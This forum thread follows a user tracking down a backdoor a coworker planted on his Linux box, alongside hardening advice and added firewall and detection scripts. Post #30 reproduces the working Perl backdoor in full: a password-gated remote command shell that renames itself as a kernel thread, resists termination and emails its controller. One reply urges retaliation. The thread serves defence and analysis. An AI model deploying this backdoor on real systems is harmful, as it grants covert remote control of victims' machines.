LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Old 04-01-2004, 07:02 PM   #16
KneeLess
Member
 
Registered: May 2003
Distribution: Debian GNU/Linux 3.0 Sid, OpenBSD 3.5
Posts: 190

Rep: Reputation: 30

Doesn't sound like a listening connection or daemon. They probably just added a line to the /etc/profile like this:
mail -s "giosue_c doesn't even know this is happening..." user@location < /dev/null

Although they may have written a simple backdoor daemon that waits for an environment variable to be set to a certain thing, or something like that.

Last edited by KneeLess; 04-01-2004 at 07:04 PM.
 
Old 04-01-2004, 08:34 PM   #17
chort
Senior Member
 
Registered: Jul 2003
Location: Silicon Valley, USA
Distribution: OpenBSD 4.6, OS X 10.6.2, CentOS 4 & 5
Posts: 3,660

Rep: Reputation: 76
Quote:
Originally posted by LaTechTech
If it is allowed I would take an old PI or PII machine and install a Smoothwall on it and put it between your computer and the local area network. Smoothwall turns your old PC into a hardware firewall. You will probably need a couple of network interface cards. That might stave off any attempts to hack your box for at least a little while, Maybe long enough to repair any damage that is already done.

Anyway, I'm just a nOOb too. These other guys seem to have way more advice than I can provide. So there are my 2cents.
Why in the world would you do that when you could just use a simple host iptables firewall script? You don't put a PIX or a Netscreen in front of every Windows box... Linux is lucky in that it's one of the few OSs (the other common one being *BSD) that has a built-in kernel level packet filter with available tools to configure it.
 
Old 04-01-2004, 08:42 PM   #18
chort
Senior Member
 
Registered: Jul 2003
Location: Silicon Valley, USA
Distribution: OpenBSD 4.6, OS X 10.6.2, CentOS 4 & 5
Posts: 3,660

Rep: Reputation: 76
For the original poster:

Unless there's some kind of reward for discovering the "backdoor", now is a good time to reformat and reinstall, using all of your new-found advice.

When reinstalling, do not connect the box to the network until you have Tripwire (or AIDE) installed & configured, and you have configured and loaded an iptables firewall that blocks all incoming connections. Ideally you should remove/disable all unnecessary services before plugging the box into the network, but it's OK to plug in if you have your firewall up and running (just don't forget to disable the services, the firewall won't always save you!).

Other steps to take would be to install a network IDS, like Snort to monitor all the traffic to your box, immediately download all the security patches for any software you have, make sure that your X session starts with "-nolisten tcp", install arpwatch to monitor IPs for sudden MAC address changes, and install logwatch or swatch to keep an eye on your log files for suspicious activity.
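As an added illustration of the "iptables firewall that blocks all incoming connections" step above (this is editor-supplied example code, not something chort or anyone else in the thread posted), here is a minimal default-deny host ruleset in iptables-restore format. The admin host address (a TEST-NET placeholder), the rules file path and the use of the `state` match are assumptions; adjust them to your box.

```shell
#!/bin/sh
# Added example: default-deny host firewall, not from the thread.
# ADMIN_HOST is a placeholder (TEST-NET-1); replace it with the one machine
# you administer from. RULES_FILE is an assumed path.
ADMIN_HOST="${ADMIN_HOST:-192.0.2.10}"
RULES_FILE="${RULES_FILE:-/etc/iptables.rules}"

build_rules() {
    # Emit the ruleset in iptables-restore format on stdout.
    # INPUT and FORWARD default to DROP; only loopback, replies to our own
    # connections, and SSH from the admin host are accepted inbound.
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
# loopback and established/related traffic are the only unconditional allows
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# new SSH sessions only from the admin host; nothing else is reachable
-A INPUT -p tcp -s $ADMIN_HOST --dport 22 -m state --state NEW -j ACCEPT
# log a rate-limited sample of drops so logwatch/swatch can report them
-A INPUT -m limit --limit 5/min -j LOG --log-prefix "iptables-drop: "
COMMIT
EOF
}

input_policy() {
    # Return the INPUT chain's default policy (expected: DROP).
    build_rules | sed -n 's/^:INPUT \([A-Z]*\).*/\1/p'
}

count_accept_rules() {
    # Number of explicit ACCEPT rules (expected: 3).
    build_rules | grep -c -- '-j ACCEPT'
}

apply_rules() {
    # Save and load in one go; needs root and iptables-restore.
    build_rules > "$RULES_FILE"
    iptables-restore < "$RULES_FILE"
}

case "${1:-}" in
    --show)  build_rules ;;
    --apply) apply_rules ;;
esac
```

Run it with `--show` to review the rules and, as root, with `--apply` to load them. A ruleset like this only hides services from the network; as the post says, the unnecessary services still have to be disabled, and X should still be started with `-nolisten tcp`.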
 
Old 04-02-2004, 10:39 AM   #19
giosue_c
Member
 
Registered: Mar 2004
Location: Kansas
Distribution: Debian!
Posts: 39

Original Poster
Rep: Reputation: 15
First of all, thanks for all the help everyone. I'm slowly making my way down the list of checks. I'll find this trapdoor.

Now in response to chort,

The reward for finding this backdoor would be to shut up the good-natured, yet annoying stream of taunts that comes from the guy who installed the trapdoor. I'm going to give myself another month to find this thing before I reinstall. And believe me when I say that the next time I install I'm going to have a checklist of things to do before I connect to the network and that list will be comprised of all the things I have learned on this forum and this thread in particular.

unSpawn,

you are right, I should give outputs instead of saying 'it looks legit' because I can make no such assertion with much confidence. I'll do that today.
 
Old 04-04-2004, 07:14 PM   #20
AltF4
Member
 
Registered: Sep 2002
Location: .at
Distribution: SuSE, Knoppix
Posts: 532

Rep: Reputation: 31
Do you have a local mailer running?

Yes: check /etc/aliases, /etc/procmailrc, etc. for strange things (mails to programs, users you don't know, etc.)
 
Old 04-07-2004, 03:40 PM   #21
geekzen
Member
 
Registered: Mar 2004
Location: Canada. The Great white north.
Distribution: Debian Sid
Posts: 183

Rep: Reputation: 30
Bastille. It will help to harden your system: http://www.bastille-linux.org/

Also, either shut down smtp or firewall it (i.e. block its port(s)), unless you absolutely need it. That will stop the emails.
 
Old 04-07-2004, 10:13 PM   #22
J.W.
LQ Veteran
 
Registered: Mar 2003
Location: Boise, ID
Distribution: Mint
Posts: 6,642

Rep: Reputation: 87
A different thought - it could be that your coworker is using disinformation in an attempt to make you waste time/effort chasing ghosts. If he's doing a little social engineering, it would be a good tactic (on his part) to create the illusion that there is a trapdoor when in fact there isn't, with his goal being to tie up as much of your time as possible on non-productive activities, leaving the real threats to continue to operate for as long as possible.

Not that I wouldn't continue to look for one, but is it a possibility that the "trapdoor" may just be a ruse, intended to distract you from noticing less obvious but more harmful threats? Maybe, maybe not.

Gotta admit, it sounds like you're having a lot of fun. -- J.W.
 
Old 04-08-2004, 03:54 PM   #23
giosue_c
Member
 
Registered: Mar 2004
Location: Kansas
Distribution: Debian!
Posts: 39

Original Poster
Rep: Reputation: 15
AHHHHHHHHHHHH HAAAAAA!!!!
EURRREEEEKA!
and all that

Ok. I have good news. I have found it. Of course this doesn't make me clean because chances are the damn thing is cloned all over the place under different names, but now that I know what it looks like and how it works hopefully I can keep my intruder out and root out all remaining instances of it in my filesystem... hopefully.

By pure chance I stumbled across a suspicious directory called .willy
It contained three files:
.badkarma - a shell script
.bash_history - a bash_history that the perp should have deleted, but instead moved here.
.Xauthority - a file I don't know anything about that when opened in vi is gibberish except the words MIT-MAGIC-COOKIE

I have found that this trapdoor is loaded from my /etc/rc.d/rc.local file.
There is also the command 'touch /var/lock/subsys/local'
I can't understand why that would be there...

I want to make sure that I do this right... I am going to remove the lines from my rc.local file. Then I'll move or delete the offending directory. Next I'll set up my firewall. (haven't decided which one to use yet)

Is there anything else I should do??? (I plan on reinstalling when fedora 2 is released)

Finally, and this question is for a moderator, would it be OK to post the code for the trapdoor? It is probably less malicious than many rootkits you can find on the web... And that way we can make sure what I do will truly disable this trapdoor.
 
Old 04-08-2004, 08:17 PM   #24
rootboy
Member
 
Registered: Oct 2001
Distribution: Mint 15
Posts: 770

Rep: Reputation: 51
Is turnabout fair play?

http://www.linuxsecurity.com/docs/Ha...ibutions.shtml

If you can get to their password file, they are in deep doo-doo.


John
 
Old 04-08-2004, 09:05 PM   #25
geekzen
Member
 
Registered: Mar 2004
Location: Canada. The Great white north.
Distribution: Debian Sid
Posts: 183

Rep: Reputation: 30
.Xauthority is normal. It is used for clients to access the X server.
 
Old 04-08-2004, 09:18 PM   #26
InTheWired
LQ Newbie
 
Registered: Apr 2004
Location: Sydney, Australia
Distribution: Mandrake
Posts: 29

Rep: Reputation: 15
geekzen

Are you sure that would be OK though? If it's inside an already suspicious directory there is a good chance it's a modified version of that original file.

My company's webserver was recently hacked... the perp spent several early mornings slowly replacing almost EVERY bin on the system. As far as I've learnt (newb) you can obtain modified bins which will do extra things than originally intended but also do their original task... i.e. hiding processes etc? Is this right, or am I completely wrong?

If I'm right you should be wary of the .Xauthority file which is now running, it might allow weird things to happen. Try checking the checksum/filesize of it against an original from cd/source?
 
Old 04-08-2004, 09:22 PM   #27
geekzen
Member
 
Registered: Mar 2004
Location: Canada. The Great white north.
Distribution: Debian Sid
Posts: 183

Rep: Reputation: 30
No... I meant if it's in the home dir. The one in .willy can go. I'm just trying to avoid a newb deleting his .Xauthority in an X session then wondering why he cannot start programs. .Xauthority is generated every time an X server is started I believe, so there is no "checksum" you can check it against. I think it's just there because the perp started an X session.

About the modified binaries, you are correct, although it's not so common. I really have to say that a reinstall is the best bet here. Back up all old files, then reinstall.
 
Old 04-09-2004, 04:11 PM   #28
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600
Quote:
Originally posted by giosue_c
Finally, and this question is for a moderator, would it be OK to post the code for the trapdoor? It is probably less malicious than many rootkits you can find on the web... And that way we can make sure what I do will truly disable this trapdoor.
Go right ahead.
 
Old 04-11-2004, 10:07 PM   #29
tekhead2
Member
 
Registered: Apr 2004
Distribution: slackware/FreeBSD/Vector
Posts: 291

Rep: Reputation: 52
Have you tried to Nmap or Nessus sweep your box yet to see if there are any ports that are open? I think that you really should check them from another box, seeing that yours is owned. If you have any weird looking ports open, look them up; most of the time a single backdoor or trojan will use a specific port. That way you could get a good idea if you are vulnerable, since your local access is somewhat tainted.
 
Old 04-12-2004, 10:42 AM   #30
giosue_c
Member
 
Registered: Mar 2004
Location: Kansas
Distribution: Debian!
Posts: 39

Original Poster
Rep: Reputation: 15
Here is the "evil server".
I am trying to understand all of what it does. It is a crash course in scripting...
I went through and put x's where our company email addresses were. Everything else is the same.


#!/usr/bin/perl -w
################################################################################
# script: esd.pl 08-AUG-2001
#
# description: Evil Server Daemon :: OH THE PAIN
################################################################################
require 5.001;

use strict;
use POSIX;
use IO::Socket;
use Mail::Sendmail;

$| = 1; # Turn off print buffering

# ------ VARIABLES ----------------------------------------------------------- #
my $password = 'fooboo';
my $port = &randport();
my $localhost = `hostname`;
chop($localhost);
my $MAILTO = 'xxxxxx@xxx.org';
my $MAILFROM = 'giosue_c <xxxx@xxx.org>';
my $SUBJECT = 'ESD - STARTED!!';

# ------ MAIN ---------------------------------------------------------------- #
# Fork once, and let the parent exit.
my $pid = fork;
die "Couldn't fork: $!\n" unless ( defined($pid) );

if ( $pid )
{
my $MESSAGE = localtime(time) ." -- Started ES Daemon \[$pid/$port\]\n";

my %mail = ( 'To' => $MAILTO,
'From' => $MAILFROM,
'Subject' => $SUBJECT,
'Message' => $MESSAGE);

$mail{'smtp'} = 'mail.xxx.org';
sendmail(%mail);

exit;
}

# Dissociate from the controlling terminal that started us and stop being
# part of whatever process group we had been a member of.
POSIX::setsid() or die "Can't start a new sesion: $!\n";

# Set ps identity, attempt to hide ;-)
$0 = "[kjourna1d]";

# Trap fatal signals, setting a flag we need to spawn a new process.
my $attempt_to_kill = 0;

# Signals to trap so that we can start another process.
$SIG{'INT'} = $SIG{'QUIT'} = $SIG{'HUP'} = $SIG{'TRAP'} = $SIG{'ABRT'} = $SIG{'STOP'} = $SIG{'IOT'} = $SIG{'TERM'} = $SIG{'KILL'} = \&shutdown;

# Wrap actual server code within the loop.
until ( $attempt_to_kill )
{
my $sock = new IO::Socket::INET (LocalHost => $localhost,
LocalPort => $port,
Proto => 'tcp',
Listen => 5,
Reuse => 1);

die "couldn't create socket: $!\n" unless ( $sock );

while( my $new_sock = $sock->accept() )
{

print $new_sock <<EOF;
, .-'"'=;_ ,
|\\.'-~`-.`-`;/|
\\.` '.'~-.` './
(\\`,__=-'__,'/)
_.-'-.( d\\_/b ).-'-._
/'.-' ' .---. ' '-.`\\
/' .' (= (_) =) '. `\\
/' .', `-.__.-.__.-' ,'. `\\
( .'. V V ; '. )
( |:: `-,__.-.__,-' ::| )
| /|`:. .:'|\\ |
| / | `:. :' |`\\ |
| | ( :. .: ) | |
| | ( `:. :' ) | |
| | \\ :. .: / | |
| | \\`:. .:'/ | |
) ( `\\`:. .:'/' ) (
( `)_ ) `:._.:' ( _(` )
\\ ' _) .' `. (_ ` /
\\ '_) / .'"```"'. \\ (_` /

EVIL SERVER
========================
OH THE PAIN
EOF

while ( defined(my $buf = <$new_sock>) )
{
$_ = $buf;

if ( /exit/ )
{
print $new_sock "sorry can't exit";
}
else
{
$_ = $buf;

if( /^$password/ )
{
$buf =~ s/^$password//o;
my $output = `$buf`;
print $new_sock $output;
}
}
}
}

close($sock);
}

# Shuts down gracefully
sub shutdown
{
$attempt_to_kill = 1;
my $MESSAGE = localtime(time) ." -- ES Daemon Shutting Down!\r\n";

my %mail = ( 'To' => $MAILTO,
'From' => $MAILFROM,
'Subject' => $SUBJECT,
'Message' => $MESSAGE);

$mail{'smtp'} = 'mail.xxx.org';
sendmail(%mail);
}

# Get Random Service Port
sub randport
{
open( SERVC, "< /etc/services" ) or die "unable to read /etc/services: $!\n";
my @ports = ();
while(<SERVC>)
{
chomp;
s/\#.*//;
s/^\s+//;
s/\s+$//;
next unless ( length );
s/\s+/\|/g;
my ( $name, $serv, $junk ) = split( /\|/, $_ );
my ( $port, $prot ) = split( /\//, $serv );
next if( $prot eq 'udp' );
next if( $port < 1024 );
push( @ports, $port );
}
close(SERVC);
srand($$^time);

return( $ports[int(rand($#ports))] );
}
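The script above gives away the three things a defender would look for on a box like this: a startup hook in rc.local (post #23), a process that renames itself to look like a kernel thread (`$0 = "[kjourna1d]"`), and a listener on a random port taken from /etc/services. The checks below are an editor-added example, not code from the thread or from any of its posters. They bundle AltF4's /etc/aliases check and tekhead2's open-port check with those three indicators. The `.willy` paths and the sample file contents are constructed for the demonstration; the stock Red Hat rc.local `touch /var/lock/subsys/local` line that puzzled post #23 is included deliberately as a legitimate line the audit should not flag.

```shell
#!/bin/sh
# Added triage checks (not from the thread). /root/.willy is the directory
# named in post #23; the sample file contents below are constructed.

write_sample_rc_local() {
    # Constructed rc.local modelled on post #23. The 'touch' line is the
    # stock Red Hat/Fedora rc.local content; the last two lines are what to flag.
    printf '%s\n' \
        '#!/bin/sh' \
        '# This script will be executed after all the other init scripts.' \
        'touch /var/lock/subsys/local' \
        '/root/.willy/.badkarma &' \
        'mail -s "started" someone@example.org < /dev/null' \
        > "$1"
}

audit_startup_file() {
    # Print non-comment lines that reference a hidden path component (/.name),
    # invoke mail, or background a job: the patterns from posts #16 and #23.
    grep -v '^[[:space:]]*#' "$1" |
        grep -E '/\.[A-Za-z0-9_]|(^|[[:space:]])mail[[:space:]]|&[[:space:]]*$'
}

write_sample_aliases() {
    # Constructed /etc/aliases: two normal entries and one delivering to a program.
    printf '%s\n' \
        '# constructed sample' \
        'postmaster: root' \
        'bin: root' \
        'helpdesk: "|/root/.willy/.badkarma"' \
        > "$1"
}

audit_aliases() {
    # Aliases that pipe mail into a program (AltF4's "mails to programs").
    grep -E '^[^#[:space:]][^:]*:[[:space:]]*"?[|]' "$1"
}

is_fake_kernel_thread() {
    # $1 = process name as ps shows it, $2 = target of /proc/PID/exe ('' if none).
    # Real kernel threads have a bracketed name and no exe link; a userland
    # process that renamed itself (the script's "[kjourna1d]") still has one.
    case "$1" in
        \[*\]) [ -n "$2" ] ;;
        *)     return 1 ;;
    esac
}

scan_procs() {
    for d in /proc/[0-9]*; do
        pid=${d#/proc/}
        name=$(tr '\0' ' ' < "$d/cmdline" 2>/dev/null | sed 's/ *$//')
        [ -n "$name" ] || continue      # genuine kernel threads have no cmdline
        exe=$(readlink "$d/exe" 2>/dev/null)
        if is_fake_kernel_thread "$name" "$exe"; then
            echo "PID $pid is named '$name' but runs $exe"
        fi
    done
}

list_listeners() {
    # Every listening TCP socket with its owning process. Compare with a scan
    # from another host, as tekhead2 suggests, since local tools may be trojaned.
    if command -v ss >/dev/null 2>&1; then ss -ltnp; else netstat -ltnp; fi
}

scan_host() {
    for f in /etc/rc.d/rc.local /etc/rc.local /etc/profile; do
        if [ -f "$f" ]; then echo "== $f"; audit_startup_file "$f"; fi
    done
    if [ -f /etc/aliases ]; then echo "== /etc/aliases"; audit_aliases /etc/aliases; fi
    echo "== processes posing as kernel threads"; scan_procs
    echo "== listening sockets"; list_listeners
}

if [ "${1:-}" = "--scan" ]; then scan_host; fi
```

Run it as root with `--scan` to audit the live system. The process check relies on a property the renaming trick cannot change: a real kernel thread has an empty /proc/PID/cmdline and no /proc/PID/exe link, while the Perl daemon keeps both. Because the posted script chooses its port from /etc/services, the listener will look like a "known" service in a port list, which is why the listening-socket output is worth reading together with the owning process name rather than the port number alone.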
 
  

